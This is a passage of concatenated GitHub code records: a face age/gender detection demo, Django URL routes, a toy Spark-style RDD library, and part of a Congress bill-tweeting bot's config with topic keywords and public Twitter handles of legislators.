int(h * r)))\n\n\ndef detect_age_gender(img: Image.Image) -> Image.Image:\n margin = 0.4\n\n img = convert_pil_2_cv2(img)\n img = resize_image(img)\n # dlib needs image in rgb format\n img_rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img_h, img_w, _ = np.shape(img_rgb)\n\n # detect faces using dlib detector\n detected = detector(img_rgb, 1)\n faces = np.empty((len(detected), img_size, img_size, 3))\n logging.info(f\"# faces: {len(detected)}\")\n if len(detected) > 0:\n for i, d in enumerate(detected):\n x1, y1, x2, y2, w, h = (\n d.left(),\n d.top(),\n d.right() + 1,\n d.bottom() + 1,\n d.width(),\n d.height(),\n )\n xw1 = max(int(x1 - margin * w), 0)\n yw1 = max(int(y1 - margin * h), 0)\n xw2 = min(int(x2 + margin * w), img_w - 1)\n yw2 = min(int(y2 + margin * h), img_h - 1)\n cv2.rectangle(img, (x1, y1), (x2, y2), (255, 0, 0), 2)\n # cv2.rectangle(img, (xw1, yw1), (xw2, yw2), (255, 0, 0), 2)\n faces[i] = cv2.resize(img[yw1 : yw2 + 1, xw1 : xw2 + 1], (img_size, img_size))\n\n # predict ages and genders of the detected faces\n results = model.predict(faces)\n predicted_genders = results[0]\n ages = np.arange(0, 101).reshape(101, 1)\n predicted_ages = results[1].dot(ages).flatten()\n # draw results\n for i, d in enumerate(detected):\n label = \"{}, {}\".format(\n int(predicted_ages[i]), \"M\" if predicted_genders[i][0] < 0.5 else \"F\"\n )\n draw_label(img, (d.left(), d.top()), label)\n logging.info(f\"label {i}: {label}\")\n return convert_cv2_2_pil(img)\n","repo_name":"dfds-data/computer-vision-tni-2021","sub_path":"src/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13458579973","text":"from rest_framework import routers\nfrom django.urls import path\nfrom .views import (\n Register,\n ObtainTokenPairView,\n UserViewSet,\n LogoutAndBlacklistRefreshTokenForUserView\n)\n\nrouter = routers.DefaultRouter()\nrouter.register('user', UserViewSet, basename='user')\n\nurlpatterns = router.urls\nurlpatterns.append(path('login/', ObtainTokenPairView.as_view(), 
name='login'))\nurlpatterns.append(path('register/', Register.as_view(), name='register'))\nurlpatterns.append(path('logout/', LogoutAndBlacklistRefreshTokenForUserView.as_view(), name='blacklist'))\n","repo_name":"shadmaan4f93/consequence","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"44038015729","text":"\nimport json\nimport pickle\nimport StringIO\nimport sys\nimport zerorpc\nimport gevent\nfrom termcolor import colored\nimport cloudpickle\nimport logging\nimport string\nimport re\n\nlogging.basicConfig()\n\nclass RDD(object):\n def __init__(self):\n pass\n \n\n def collectToDic(self, p):\n elements = {}\n while True:\n element = self.get(p)\n if element == None:\n break\n # print element\n elements.update(element)\n # print '-----'\n # print elements\n # print '-----'\n return elements\n\n def collect(self, p):\n elements = []\n while True:\n element = self.get(p)\n if element == None:\n break\n # print element\n elements.append(element)\n # print '-----'\n # print elements\n # print '-----'\n return elements\n\n def count(self, p):\n return len(self.collect(p))\n\n def reduce(self, func):\n pass\n\n def save(self, p):\n \n if p != 10:\n \n stringWriteToFile = {}\n while True:\n\n temp = self.get(p)\n if temp == None:\n break\n stringWriteToFile.update(temp)\n\n return stringWriteToFile\n \n \n\nclass TextFile(RDD):\n\n def __init__(self, filename):\n self.filename = filename\n self.lines = None\n self.index = 0\n\n def get(self, p): \n start = p['start']\n end = p['end'] \n\n lines = open(self.filename, 'r').read()[start:end]\n # print 'lines:%s' %lines\n self.lines = lines.strip().split('\\n')\n \n if self.index == len(self.lines):\n self.index = 0\n return None\n \n else:\n line = self.lines[self.index]\n # line = re.sub('[!@#$,.\\\"\\']', '', line)\n \n self.index += 1\n # print 'line: %s' %line\n return line\n\n\nclass FlatMap(RDD):\n\n def __init__(self, parent, func):\n self.parent = parent\n self.func = func\n\n def get(self, p):\n # print 'flat map'\n element = self.parent.get(p)\n # print '~~!~~~!~~'\n # print element\n # print colored('------', 'red')\n # print 'run flat map'\n # print p\n # print self.get(p)\n # print colored('------', 'red')\n if element == None:\n return None\n else:\n # print type(element)\n element_new = self.func(element)\n # print 'flat map result: %s' % element_new\n return element_new\n\nclass Map(RDD):\n\n def __init__(self, parent, func):\n self.parent = parent\n self.func = func\n\n def get(self, p):\n # print 'mapping!'\n elements = self.parent.get(p)\n # print '~~!~~~!~~~!~~!~~~'\n # print elements\n # print colored('------', 'red')\n # print 'run map'\n # print p\n # print self.get(p)\n # print colored('------', 'red')\n\n # print elements\n if elements == None:\n return None\n else:\n elements_new = []\n for element in elements:\n a = self.func(element)\n # print 'self func element: %s' % a\n elements_new.append(a)\n # print 'map result: % s' % elements_new\n return elements_new\n\nclass MapValues(RDD):\n\n def __init__(self, parent, func):\n self.parent = parent\n self.func = func\n\n def get(self, p):\n elements = self.parent.get(p)\n # print elements\n if elements == None:\n return None\n else:\n for k, v in elements.iteritems():\n v = self.func(v)\n return elements\n\nclass Filter(RDD):\n \n def __init__(self, parent, func):\n self.parent = parent\n self.func = func\n\n def get(self, 
p):\n while True:\n element = self.parent.get(p)\n # print 'test'\n # print p\n if element == None:\n return None\n else:\n if self.func(element):\n return element\n\n\nclass GroupByKey(RDD):\n def __init__(self, parent):\n self.parent = parent\n # self.func = func\n self.new_element = {}\n def get(self, p):\n element = self.parent.get(p)\n if element == None:\n self.new_element = {}\n return None\n else:\n # print element\n for k in element:\n if k in self.new_element:\n self.new_element[k].append(element[k])\n else:\n self.new_element[k] = [element[k]]\n return self.new_element\n\nclass ReduceByKey(RDD):\n\n def __init__(self, parent, func):\n super(ReduceByKey, self).__init__()\n self.parent = parent\n self.func = func\n self.new_element = {}\n\n def get(self, p):\n element = self.parent.get(p)\n if element == None:\n self.new_element = {}\n return None\n else:\n for k, v in element:\n # print 'k%s'% k\n # print 'k%s'% v\n if k in self.new_element:\n self.new_element[k] = self.func(self.new_element[k], v)\n else:\n self.new_element[k] = v\n # print 'reduce by key result new_element: %s' % self.new_element\n return self.new_element\n\n# class Join(RDD, inMap):\n# def __init__(self, parent):\n# super(Join, self).__init__()\n# self.parent = parent\n# self.new_element = {}\n\n# def get(self, p):\n# element = self.parent.get(p)\n# if element\n\n\n\n\n\n\n\n","repo_name":"michellegao715/MicroSpark","sub_path":"rdd.py","file_name":"rdd.py","file_ext":"py","file_size_in_byte":5798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"28474426234","text":"__version__ = '0.1'\n\n\"\"\"\nAnnoying stopgap: Twitter reserves some space for their t.co 'shortened' links.\nThat's 23-24 characters. Just going for a safe upper bound here. 
See:\n https://github.com/bear/python-twitter/issues/265\n https://github.com/bear/python-twitter/issues/457\n\"\"\"\nTWEET_MAX_LENGTH = 116 # 140 - 24 \nSLEEP_LIMIT = 8\n\nKEYWORDS = ['cyber',\n 'hacking',\n 'hacker',\n 'hacked',\n 'breach',\n 'privacy',\n 'Internet',\n 'broadband',\n 'crypto',\n 'net neutrality',\n 'communications',\n 'fcc']\n #'hack',\n #'leak',\n #'nsa',\n #'data',\n #'technology',\n #'digital',\n #'security']\n\nCONGRESS = '115'\nROOT_URL = 'https://www.gpo.gov/fdsys/'\nBULK_PATH = 'bulkdata/BILLSTATUS/'\nBASE_URL = ROOT_URL + BULK_PATH + CONGRESS\n\nSENATE_URL = BASE_URL + '/s/'\nSRES_URL = BASE_URL + '/sres/'\nSJRES_URL = BASE_URL + '/sjres/'\nSCONRES_URL = BASE_URL + '/sconres/'\nHOUSE_URL = BASE_URL + '/hr/'\nHRES_URL = BASE_URL + '/hres/'\nHJRES_URL = BASE_URL + '/hjres/'\nHCONRES_URL = BASE_URL + '/hconres/'\n\nURL_LIST = [SENATE_URL,\n SRES_URL,\n SJRES_URL,\n SCONRES_URL,\n HOUSE_URL,\n HRES_URL,\n HJRES_URL,\n HCONRES_URL]\n\nCONGRESS_URL = 'https://www.congress.gov/bill/'\nBILL_TYPES_PATH = {'S': 'senate-bill',\n 'SRES': 'senate-resolution',\n 'SJRES': 'senate-joint-resolution',\n 'SCONRES': 'senate-concurrent-resolution',\n 'HR': 'house-bill',\n 'HRES': 'house-resolution',\n 'HJRES': 'house-joint-resolution',\n 'HCONRES': 'house-concurrent-resolution'}\n\nCONGRESS_TWITTER = {\n 'Brown, Sherrod': '@SenSherrodBrown',\n 'Cantwell, Maria': '@SenatorCantwell',\n 'Cardin, Benjamin': '@SenatorCardin',\n 'Carper, Thomas': '@SenatorCarper',\n 'Casey, Robert': '@SenBobCasey',\n 'Corker, Bob': '@SenBobCorker',\n 'Feinstein, Dianne': '@SenFeinstein',\n 'Hatch, Orrin': '@SenOrrinHatch',\n 'Klobuchar, Amy': '@amyklobuchar _',\n 'McCaskill, Claire': '@McCaskillOffice',\n 'Menendez, Robert': '@SenatorMenendez',\n 'Nelson, Bill': '@SenBillNelson',\n 'Sanders, Bernard': '@SenSanders',\n 'Stabenow, Debbie': '@SenStabenow',\n 'Tester, Jon': '@SenatorTester',\n 'Whitehouse, Sheldon': '@SenWhitehouse',\n 'Barrasso, John': '@SenJohnBarrasso',\n 'Wicker, Roger': '@SenatorWicker',\n 'Alexander, Lamar': '@SenAlexander',\n 'Cochran, Thad': '@SenThadCochran',\n 'Collins, Susan': '@SenatorCollins',\n 'Cornyn, John': '@JohnCornyn',\n 'Durbin, Richard': '@SenatorDurbin',\n 'Enzi, Michael': '@SenatorEnzi',\n 'Graham, Lindsey': '@GrahamBlog',\n 'Inhofe, James': '@InhofePress',\n 'McConnell, Mitch': '@McConnellPress',\n 'Merkley, Jeff': '@SenJeffMerkley',\n 'Reed, John': '@SenJackReed',\n 'Risch, James': '@SenatorRisch',\n 'Roberts, Pat': '@SenPatRoberts',\n 'Shaheen, Jeanne': '@SenatorShaheen',\n 'Udall, Tom': '@SenatorTomUdall',\n 'Warner, Mark': '@MarkWarner',\n 'Gillibrand, Kirsten': '@SenGillibrand',\n 'Franken, Alan': '@SenFranken',\n 'Coons, Chris': '@SenCoonsOffice',\n 'Manchin, Joe': '@Sen_JoeManchin',\n 'Aderholt, Robert': '@Robert_Aderholt',\n 'Amash, Justin': '@justinamash',\n 'Baldwin, Tammy': '@SenatorBaldwin',\n 'Barletta, Lou': '@RepLouBarletta',\n 'Barton, Joe': '@RepJoeBarton',\n 'Bass, Karen': '@RepKarenBass',\n 'Bennet, Michael': '@SenBennetCo',\n 'Bilirakis, Gus': '@RepGusBilirakis',\n 'Bishop, Rob': '@RepRobBishop',\n 'Bishop, Sanford': '@SanfordBishop',\n 'Black, Diane': '@RepDianeBlack',\n 'Blackburn, Marsha': '@MarshaBlackburn',\n 'Blumenauer, Earl': '@BlumenauerMedia',\n 'Blumenthal, Richard': '@SenBlumenthal',\n 'Blunt, Roy': '@RoyBlunt',\n 'Boozman, John': '@JohnBoozman',\n 'Bordallo, Madeleine': None,\n 'Brady, Kevin': '@RepKevinBrady',\n 'Brady, Robert': '@RepBrady',\n 'Brooks, Mo': '@RepMoBrooks',\n 'Buchanan, Vern': '@VernBuchanan',\n 'Bucshon, Larry': 
'@RepLarryBucshon',\n 'Burgess, Michael': '@MichaelCBurgess',\n 'Burr, Richard': '@SenatorBurr',\n 'Butterfield, George': '@GKButterfield',\n 'Calvert, Ken': '@KenCalvert',\n 'Capito, Shelley': '@SenCapito',\n 'Capuano, Michael': '@RepMikeCapuano',\n 'Carson, Andre': '@RepAndreCarson',\n 'Carter, John': '@JudgeCarter',\n 'Cassidy, Bill': '@BillCassidy',\n 'Castor, Kathy': '@USRepKCastor',\n 'Chabot, Steve': '@RepSteveChabot',\n 'Chaffetz, Jason': '@JasonInTheHouse',\n 'Chu, Judy': '@RepJudyChu',\n 'Cicilline, David': '@RepCicilline',\n 'Clarke, Yvette': '@RepYvetteClarke',\n 'Clay, Wm.': None,\n 'Cleaver, Emanuel': '@RepCleaver',\n 'Clyburn, James': '@Clyburn',\n 'Coffman, Mike': '@RepMikeCoffman',\n 'Cohen, Steve': '@RepCohen',\n 'Cole, Tom': '@TomColeOK04',\n 'Conaway, K.': '@ConawayTX11',\n 'Connolly, Gerald': '@GerryConnolly',\n 'Conyers, John': '@RepJohnConyers',\n 'Cooper, Jim': '@RepJimCooper',\n 'Costa, Jim': '@RepJimCosta',\n 'Courtney, Joe': '@RepJoeCourtney',\n 'Crapo, Michael': '@MikeCrapo',\n 'Crawford, Eric': '@RepRickCrawford',\n 'Crowley, Joseph': '@RepJoeCrowley',\n 'Cuellar, Henry': '@RepCuellar',\n 'Culberson, John': '@CongCulberson',\n 'Cummings, Elijah': '@RepCummings',\n 'Davis, Danny': '@RepDannyDavis',\n 'Davis, Susan': '@RepSusanDavis',\n 'DeFazio, Peter': '@RepPeterDeFazio',\n 'DeGette, Diana': '@RepDianaDeGette',\n 'DeLauro, Rosa': '@RosaDeLauro',\n 'Denham, Jeff': '@RepJeffDenham',\n 'Dent, Charles': '@RepCharlieDent',\n 'DesJarlais, Scott': '@DesJarlaisTN04',\n 'Deutch, Theodore': '@RepTedDeutch',\n 'Diaz-Balart, Mario': '@MarioDB',\n 'Doggett, Lloyd': '@RepLloydDoggett',\n 'Donnelly, Joe': '@SenDonnelly',\n 'Doyle, Michael': '@USRepMikeDoyle',\n 'Duffy, Sean': '@RepSeanDuffy',\n 'Duncan, Jeff': '@RepJeffDuncan',\n 'Duncan, John': '@RepJohnDuncanJr',\n 'Ellison, Keith': '@KeithEllison',\n 'Engel, Eliot': '@RepEliotEngel',\n 'Eshoo, Anna': '@RepAnnaEshoo',\n 'Farenthold, Blake': '@Farenthold',\n 'Flake, Jeff': '@JeffFlake',\n 'Fleischmann, Charles': '@RepChuck',\n 'Flores, Bill': '@RepBillFlores',\n 'Fortenberry, Jeff': '@JeffFortenberry',\n 'Foxx, Virginia': '@VirginiaFoxx',\n 'Franks, Trent': '@RepTrentFranks',\n 'Frelinghuysen, Rodney': '@USRepRodney',\n 'Fudge, Marcia': '@RepMarciaFudge',\n 'Garamendi, John': '@RepGaramendi',\n 'Gardner, Cory': '@SenCoryGardner',\n 'Gibbs, Bob': '@RepBobGibbs',\n 'Gohmert, Louie': '@RepLouieGohmert',\n 'Goodlatte, Bob': '@RepGoodlatte',\n 'Gosar, Paul': '@RepGosar',\n 'Gowdy, Trey': '@TGowdySC',\n 'Granger, Kay': '@RepKayGranger',\n 'Grassley, Charles': '@ChuckGrassley',\n 'Graves, Sam': '@RepSamGraves',\n 'Graves, Tom': '@RepTomGraves',\n 'Green, Al': '@RepAlGreen',\n 'Green, Gene': '@RepGeneGreen',\n 'Griffith, H.': '@RepMGriffith',\n 'Grijalva, Raul': '@RepraulGrijalva',\n 'Guthrie, Brett': '@RepGuthrie',\n 'Gutierrez, Luis': '@RepGutierrez',\n 'Harper, Gregg': '@GreggHarper',\n 'Harris, Andy': '@RepAndyHarrisMD',\n 'Hartzler, Vicky': '@RepHartzler',\n 'Hastings, Alcee': '@RepHastingsFL',\n 'Heinrich, Martin': '@MartinHeinrich',\n 'Hensarling, Jeb': '@RepHensarling',\n 'Herrera Beutler, Jaime': '@HerreraBeutler',\n 'Higgins, Brian': '@RepBrianHiggins',\n 'Himes, James': '@JAHimes',\n 'Hirono, Mazie': '@MazieHirono',\n 'Hoeven, John': '@SenJohnHoeven',\n 'Hoyer, Steny': '@WhipHoyer',\n 'Huizenga, Bill': '@RepHuizenga',\n 'Hultgren, Randy': '@RepHultgren',\n 'Hunter, Duncan': '@Rep_Hunter',\n 'Isakson, John': '@SenatorIsakson',\n 'Issa, Darrell': '@DarrellIssa',\n 'Jackson Lee, Sheila': '@JacksonLeeTX18',\n 'Jenkins, Lynn': 
'@RepLynnJenkins',\n 'Johnson, Bill': '@RepBillJohnson',\n 'Johnson, Eddie': '@RepEBJ',\n 'Johnson, Henry': '@RepHankJohnson',\n 'Johnson, Ron': '@SenRonJohnson',\n 'Johnson, Sam': '@SamsPressShop',\n 'Jones, Walter': '@RepWalterJones',\n 'Jordan, Jim': '@Jim_Jordan',\n 'Kaptur, Marcy': '@RepMarcyKaptur',\n 'Keating, William': '@USRepKeating',\n 'Kelly, Mike': '@MikeKellyPA',\n 'Kind, Ron': '@RepRonKind',\n 'King, Peter': '@RepPeteKing',\n 'King, Steve': '@SteveKingIA',\n 'Kinzinger, Adam': '@RepKinzinger',\n 'Labrador, Raul': '@Raul_Labrador',\n 'Lamborn, Doug': '@RepDLamborn',\n 'Lance, Leonard': '@RepLanceNJ7',\n 'Langevin, James': '@JimLangevin',\n 'Lankford, James': '@SenatorLankford',\n 'Larsen, Rick': '@RepRickLarsen',\n 'Larson, John': '@RepJohnLarson',\n 'Latta, Robert': '@BobLatta',\n 'Leahy, Patrick': '@SenatorLeahy',\n 'Lee, Barbara': '@RepBarbaraLee',\n 'Lee, Mike': '@SenMikeLee',\n 'Levin, Sander': '@RepSandyLevin',\n 'Lewis, John': '@RepJohnLewis',\n 'Lipinski, Daniel': '@RepLipinski',\n 'LoBiondo, Frank': '@RepLoBiondo',\n 'Loebsack, David': '@DaveLoebsack',\n 'Lofgren, Zoe': '@RepZoeLofgren',\n 'Long, Billy': '@USRepLong',\n 'Lowey, Nita': '@NitaLowey',\n 'Lucas, Frank': '@RepFrankLucas',\n 'Luetkemeyer, Blaine': '@RepBlainePress',\n 'Lujan, Ben': '@RepBenRayLujan',\n 'Lynch, Stephen': '@RepStephenLynch',\n 'Maloney, Carolyn': '@RepMaloney',\n 'Marchant, Kenny': '@RepKenMarchant',\n 'Marino, Tom': '@RepTomMarino',\n 'Markey, Edward': '@SenMarkey',\n 'Matsui, Doris': '@DorisMatsui',\n 'McCain, John': '@SenJohnMcCain',\n 'McCarthy, Kevin': '@GOPLeader',\n 'McCaul, Michael': '@RepMcCaul',\n 'McClintock, Tom': '@RepMcClintock',\n 'McCollum, Betty': '@BettyMcCollum04',\n 'McGovern, James': '@RepMcGovern',\n 'McHenry, Patrick': '@PatrickMcHenry',\n 'McKinley, David': '@RepMcKinley',\n 'McMorris Rodgers, Cathy': '@CathyMcMorris',\n 'McNerney, Jerry': '@RepMcNerney',\n 'Meehan, Patrick': '@RepMeehan',\n 'Meeks, Gregory': '@GregoryMeeks',\n 'Moore, Gwen': '@RepGwenMoore',\n 'Moran, Jerry': '@JerryMoran',\n 'Murkowski, Lisa': '@LisaMurkowski',\n 'Murphy, Christopher': '@senmurphyoffice',\n 'Murphy, Tim': '@RepTimMurphy',\n 'Murray, Patty': '@PattyMurray',\n 'Nadler, Jerrold': '@RepJerryNadler',\n 'Napolitano, Grace': '@GraceNapolitano',\n 'Neal, Richard': '@RepRichardNeal',\n 'Noem, Kristi': '@RepKristiNoem',\n 'Norton, Eleanor': '@EleanorNorton',\n 'Nunes, Devin': '@Rep_DevinNunes',\n 'Olson, Pete': '@RepPeteOlson',\n 'Palazzo, Steven': '@CongPalazzo',\n 'Pallone, Frank': '@FrankPallone',\n 'Pascrell, Bill': '@BillPascrell',\n 'Paul, Rand': '@RandPaul',\n 'Paulsen, Erik': '@RepErikPaulsen',\n 'Pearce, Stevan': '@RepStevePearce',\n 'Pelosi, Nancy': 'NonecyPelosi',\n 'Perlmutter, Ed': '@RepPerlmutter',\n 'Peters, Gary': '@SenGaryPeters',\n 'Peterson, Collin': '@collinpeterson',\n 'Pingree, Chellie': '@ChelliePingree',\n 'Poe, Ted': '@JudgeTedPoe',\n 'Polis, Jared': '@RepJaredPolis',\n 'Portman, Robert': '@SenRobPortman',\n 'Posey, Bill': '@CongBillPosey',\n 'Price, David': '@RepDavidEPrice',\n 'Quigley, Mike': '@RepMikeQuigley',\n 'Reed, Tom': '@RepTomReed',\n 'Reichert, David': '@DaveReichert',\n 'Renacci, James': '@RepJimRenacci',\n 'Richmond, Cedric': '@RepRichmond',\n 'Roby, Martha': '@RepMarthaRoby',\n 'Roe, David': '@DrPhilRoe',\n 'Rogers, Harold': '@RepHalRogers',\n 'Rogers, Mike': '@RepMikeRogersAL',\n 'Rohrabacher, Dana': '@reprohrabacher',\n 'Rokita, Todd': '@ToddRokita',\n 'Rooney, Thomas': '@TomRooney',\n 'Ros-Lehtinen, Ileana': '@RosLehtinen',\n 'Roskam, Peter': 
'@PeterRoskam',\n 'Ross, Dennis': '@RepDennisRoss',\n 'Roybal-Allard, Lucille': '@RepRoybalAllard',\n 'Royce, Edward': '@RepEdRoyce',\n 'Rubio, Marco': '@SenRubioPress',\n 'Ruppersberger, C.': '@Call_Me_Dutch',\n 'Rush, Bobby': '@RepBobbyRush',\n 'Ryan, Paul': '@SpeakerRyan',\n 'Ryan, Tim': '@RepTimRyan',\n 'Sablan, Gregorio': None,\n 'Sarbanes, John': '@RepSarbanes',\n 'Scalise, Steve': '@SteveScalise',\n 'Schakowsky, Janice': '@JanSchakowsky',\n 'Schiff, Adam': '@RepAdamSchiff',\n 'Schrader, Kurt': '@RepSchrader',\n 'Schumer, Charles': '@SenSchumer',\n 'Schweikert, David': '@RepDavid',\n 'Scott, Austin': '@AustinScottGA08',\n 'Scott, David': '@RepDavidScott',\n 'Scott, Robert': '@BobbyScott',\n 'Scott, Tim': '@SenatorTimScott',\n 'Sensenbrenner, F.': '@JimPressOffice',\n 'Serrano, Jose': '@RepJoseSerrano',\n 'Sessions, Pete': '@PeteSessions',\n 'Sewell, Terri': '@RepTerriSewell',\n 'Shelby, Richard': '@SenShelby',\n 'Sherman, Brad': '@BradSherman',\n 'Shimkus, John': '@RepShimkus',\n 'Shuster, Bill': '@RepBillShuster',\n 'Simpson, Michael': '@CongMikeSimpson',\n 'Sires, Albio': '@RepSires',\n 'Slaughter, Louise': '@LouiseSlaughter',\n 'Smith, Adam': '@RepAdamSmith',\n 'Smith, Adrian': '@RepAdrianSmith',\n 'Smith, Christopher': '@RepChrisSmith',\n 'Smith, Lamar': '@LamarSmithTX21',\n 'Speier, Jackie': '@RepSpeier',\n 'Stivers, Steve': '@RepSteveStivers',\n 'Sanchez, Linda': '@RepLindaSanchez',\n 'Thompson, Bennie': '@BennieGThompson',\n 'Thompson, Mike': '@RepThompson',\n 'Thompson, Glenn': '@CongressmanGT',\n 'Thornberry, Mac': '@MacTXPress',\n 'Thune, John': '@SenJohnThune',\n 'Tiberi, Patrick': '@pattiberi',\n 'Tipton, Scott': '@RepTipton',\n 'Tonko, Paul': '@RepPaulTonko',\n 'Toomey, Patrick': '@SenToomey',\n 'Tsongas, Niki': '@NikiInTheHouse',\n 'Turner, Michael': '@RepMikeTurner',\n 'Upton, Fred': '@RepFredUpton',\n 'Van Hollen, Chris': '@ChrisVanHollen',\n 'Velazquez, Nydia': '@NydiaVelazquez',\n 'Visclosky, Peter': '@RepVisclosky',\n 'Walberg, Tim': '@RepWalberg',\n 'Walden, Greg': '@RepGregWalden',\n 'Walz, Timothy': '@RepTimWalz',\n 'Wasserman Schultz, Debbie': '@RepDWStweets',\n 'Waters, Maxine': '@MaxineWaters',\n 'Webster, Daniel': '@RepWebster',\n 'Welch, Peter': '@PeterWelch',\n 'Wilson, Joe': '@RepJoeWilson',\n 'Wilson, Frederica': '@RepWilson',\n 'Wittman, Robert': '@RobWittman',\n 'Womack, Steve': '@Rep_SteveWomack',\n 'Woodall, Rob': '@RepRobWoodall',\n 'Wyden, Ron': '@RonWyden',\n 'Yarmuth, John': '@RepJohnYarmuth',\n 'Yoder, Kevin': '@RepKevinYoder',\n 'Young, Don': '@RepDonYoung',\n 'Young, Todd': '@SenToddYoung',\n 'Heller, Dean': '@SenDeanHeller',\n 'Amodei, Mark': '@MarkAmodeiNV2',\n 'Bonamici, Suzanne': '@RepBonamici',\n 'DelBene, Suzan': '@RepDelBene',\n 'Massie, Thomas': '@RepThomasMassie',\n 'Payne, Donald': '@RepDonaldPayne',\n 'Schatz, Brian': '@SenBrianSchatz',\n 'Foster, Bill': '@RepBillFoster',\n 'Titus, Dina': '@RepDinaTitus',\n 'Cotton, Tom': '@SenTomCotton',\n 'Sinema, Kyrsten': '@RepSinema',\n 'LaMalfa, Doug': '@RepLaMalfa',\n 'Huffman, Jared': '@RepHuffman',\n 'Bera, Ami': '@RepBera',\n 'Cook, Paul': '@RepPaulCook',\n 'Swalwell, Eric': '@RepSwalwell',\n 'Valadao, David': '@RepDavidValadao',\n 'Brownley, Julia': '@JuliaBrownley26',\n 'Cardenas, Tony': '@RepCardenas',\n 'Ruiz, Raul': '@CongressmanRuiz',\n 'Takano, Mark': '@RepMarkTakano',\n 'Lowenthal, Alan': '@RepLowenthal',\n 'Vargas, Juan': '@RepJuanVargas',\n 'Peters, Scott': '@RepScottPeters',\n 'Esty, Elizabeth': '@RepEsty',\n 'Yoho, Ted': '@RepTedYoho',\n 'DeSantis, Ron': '@RepDeSantis',\n 
'Frankel, Lois': '@RepLoisFrankel',\n 'Collins, Doug': '@RepDougCollins',\n 'Gabbard, Tulsi': '@TulsiPress',\n 'Duckworth, Tammy': '@SenDuckworth',\n 'Davis, Rodney': '@RodneyDavis',\n 'Bustos, Cheri': '@RepCheri',\n 'Walorski, Jackie': '@RepWalorski',\n 'Brooks, Susan': '@SusanWBrooks',\n 'Messer, Luke': '@RepLukeMesser',\n 'Barr, Garland': '@RepAndyBarr',\n 'Warren, Elizabeth': '@SenWarren',\n 'Kennedy, Joseph': '@RepJoeKennedy',\n 'Delaney, John': '@RepJohnDelaney',\n 'King, Angus': '@SenAngusKing',\n 'Kildee, Daniel': '@RepDanKildee',\n 'Nolan, Richard': '@USRepRickNolan',\n 'Wagner, Ann': '@RepAnnWagner',\n 'Daines, Steve': '@SteveDaines',\n 'Hudson, Richard': '@RepRichHudson',\n 'Pittenger, Robert': '@RepPittenger',\n 'Meadows, Mark': '@RepMarkMeadows',\n 'Holding, George': '@RepHolding',\n 'Heitkamp, Heidi': '@SenatorHeitkamp',\n 'Cramer, Kevin': '@RepKevinCramer',\n 'Fischer, Deb': '@SenatorFischer',\n 'Kuster, Ann': '@RepAnnieKuster',\n 'Lujan Grisham, Michelle': '@RepLujanGrisham',\n 'Meng, Grace': '@RepGraceMeng',\n 'Jeffries, Hakeem': '@RepJeffries',\n 'Maloney, Sean': '@RepSeanMaloney',\n 'Collins, Chris': '@RepChrisCollins',\n 'Wenstrup, Brad': '@RepBradWenstrup',\n 'Beatty, Joyce': '@RepBeatty',\n 'Joyce, David': '@RepDaveJoyce',\n 'Bridenstine, Jim': '@RepJBridenstine',\n 'Mullin, Markwayne': '@RepMullin',\n 'Perry, Scott': '@RepScottPerry',\n 'Rothfus, Keith': '@KeithRothfus',\n 'Cartwright, Matthew': '@RepCartwright',\n 'Rice, Tom': '@RepTomRice',\n 'Cruz, Ted': '@SenTedCruz',\n 'Weber, Randy': '@TXRandy14',\n \"O'Rourke, Beto\": '@RepBetoORourke',\n 'Castro, Joaquin': '@JoaquinCastrotx',\n 'Williams, Roger': '@RepRWilliams',\n 'Veasey, Marc': '@RepVeasey',\n 'Vela, Filemon': '@RepFilemonVela',\n 'Stewart, Chris': '@RepChrisStewart',\n 'Kaine, Timothy': '@SenKaineOffice',\n 'Kilmer, Derek': '@RepDerekKilmer',\n 'Heck, Denny': '@RepDennyHeck',\n 'Pocan, Mark': '@RepMarkPocan',\n 'Kelly, Robin': '@RepRobinKelly',\n 'Sanford, Marshall': '@RepSanfordSC',\n 'Smith, Jason': '@RepJasonSmith',\n 'Booker, Cory': '@senbookeroffice',\n 'Clark, Katherine': '@RepKClark',\n 'Byrne, Bradley': '@RepByrne',\n 'Brat, David': '@RepDaveBrat',\n 'Norcross, Donald': '@DonaldNorcross',\n 'Adams, Alma': '@RepAdams',\n 'Palmer, Gary': '@USRepGaryPalmer',\n 'Hill, French': '@RepFrenchHill',\n 'Westerman, Bruce': '@RepWesterman',\n 'McSally, Martha': '@RepMcSally',\n 'Gallego, Ruben': '@RepRubenGallego',\n 'DeSaulnier, Mark': '@RepDeSaulnier',\n 'Knight, Steve': '@SteveKnight25',\n 'Aguilar, Pete': '@reppeteaguilar',\n 'Lieu, Ted': '@RepTedLieu',\n 'Torres, Norma': '@NormaJTorres',\n 'Walters, Mimi': '@RepMimiWalters',\n 'Buck, Ken': '@RepKenBuck',\n 'Curbelo, Carlos': '@RepCurbelo',\n 'Carter, Buddy': '@RepBuddyCarter',\n 'Hice, Jody': '@congressmanhice',\n 'Loudermilk, Barry': '@RepLoudermilk',\n 'Allen, Rick': '@reprickallen',\n 'Blum, Rod': '@RepRodBlum',\n 'Young, David': '@RepDavidYoung',\n 'Bost, Mike': '@RepBost',\n 'Abraham, Ralph': '@RepAbraham',\n 'Graves, Garret': '@RepGarretGraves',\n 'Moulton, Seth': '@teammoulton',\n 'Poliquin, Bruce': '@RepPoliquin',\n 'Moolenaar, John': '@RepMoolenaar',\n 'Bishop, Mike': '@RepMikeBishop',\n 'Trott, Dave': '@repdavetrott',\n 'Dingell, Debbie': '@RepDebDingell',\n 'Lawrence, Brenda': '@RepLawrence',\n 'Emmer, Tom': '@RepTomEmmer',\n 'Rouzer, David': '@RepDavidRouzer',\n 'MacArthur, Tom': '@RepTomMacArthur',\n 'Watson Coleman, Bonnie': '@RepBonnie',\n 'Zeldin, Lee': '@RepLeeZeldin',\n 'Rice, Kathleen': '@RepKathleenRice',\n 'Stefanik, Elise': 
